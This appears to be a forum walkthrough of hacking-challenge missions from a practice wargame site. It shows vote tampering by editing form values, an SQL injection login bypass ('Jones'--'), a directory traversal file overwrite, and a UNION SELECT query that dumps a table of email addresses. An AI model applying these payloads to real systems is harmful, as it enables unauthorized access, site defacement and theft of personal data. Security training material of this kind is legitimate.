1. Uncle Arnold's Local Band Review
So this dudes band is on the last place, what a noob ;o
Well, lets help him out anyway :)
Make sure you have firebug addon, its very usefull, lets have a look at the voting part.
click the inspect button and then click on the dropdown for voting:
Code: Select all
<select name="vote">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
Click on the 1 in value="1" and change it to a big number(100000 for example). Press the vote button and you're done :)
2. Chicago American Nazi Party
Ah whats that? Lame racist people? :o HAX!
First thing we're gonna do is check the pages source.
Near the bottom it says
Code: Select all
<a href="update.php"><font color="#000000">update</font></a>
Press control+a on the main page and you'll see the 'update' link :) click on it.
Hmm, a login form :o
lets enter the name of one of the fishes that posted(I took Jones)
Lets try if its vurnable to SQL injection:
username:
Jones'--
password:
djfhsjkfhjkfh
wooo we're in
3. Peace Poetry: HACKED
This one was a pain in the ass.
Keyword to solve this one is directory traversal(see basic 8 and 9)
View the page source of the haxxored page, hmm, its all cluttered up on 1 line, but theres a massive scrollbar :o
Scroll down :)
Code: Select all
<!--Note to the webmasterThis website has been hacked, but not totally destroyed. The old website is still up. I simply copied the old index.html file to oldindex.html and remade this one. Sorry about the inconvenience.-->
Go to oldindex.html's source and control+a and copy it all.
now click the submit poem button, we're gonna use directory traversal to overwrite the old index.html!
name:
Code: Select all
../index.html
Code: Select all
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head> <title>peace be with all</title></head><body background="bg.jpg" text='#FFFFFF' link="#FFF833" vlink="#FFF833"><center><font face="verdana" size=7><b>Peace Poetry</b></font><table cellspacing=0 border=0 cellpadding=0 align="center" width=760><tr><td width=230><font face="verdana" size=2><b>"What difference does it make to the dead, the orphans and the homeless, whether the mad destruction is wrought under the name of totalitarianism or the holy name of liberty and democracy?" - Mahatma Gandi<br /><br />"A war is not won if the defeated enemy has not been turned into a friend."</b></font></td><td width=300 valign="top"><img src="peace.jpg" width=297 height=300></td><td width=230><font face="verdana" size=2><b>"The greatest purveyor of violence in the world today is my own government. For the sake of hundreds of thousands trembling under our violence, I cannot be silent." - Martin Luther King Jr.<br /><br />"The nationalist not only does not disapprove of atrocities committed by his own side, but he has a remarkable capacity for not even hearing about them." - George Orwell</b></font></td></tr></table><table width=600 cellspacing=0 cellpadding=0 border=0 align="center"><tr><td><font face="verdana" size=3><b>Welcome to Peace Poetry. This website features several poems crying out for freedom, liberty, justice, peace, love and understanding. You can also submit your own poetry!<br /><br /><center><a href="readpoems.php">Read The Poetry</a> | <a href="submitpoems.php">Submit Poetry</a><br /><br /></center></b></font></td></tr></table></center></body></html>
First thing u wanna do is check out all the links.
The 2 links on the page are using get(they retrieve stuff from the database)
The submit email button uses post.
now if u submit something random you'll see
Code: Select all
Error inserting into table "email"! Email not valid! Please contact an administrator of Fischer's
go to the catagory page, and behind the catagory=1 paste this:
Code: Select all
UNION ALL SELECT NULL, *, NULL, NULL FROM email;
press enter and voila, list of emails is at the bottom of the page! :)
now copy them over to notepad, make em so its 1 email per line, then send a privite message to SaveTheWhales with message content the emails and you're done! :)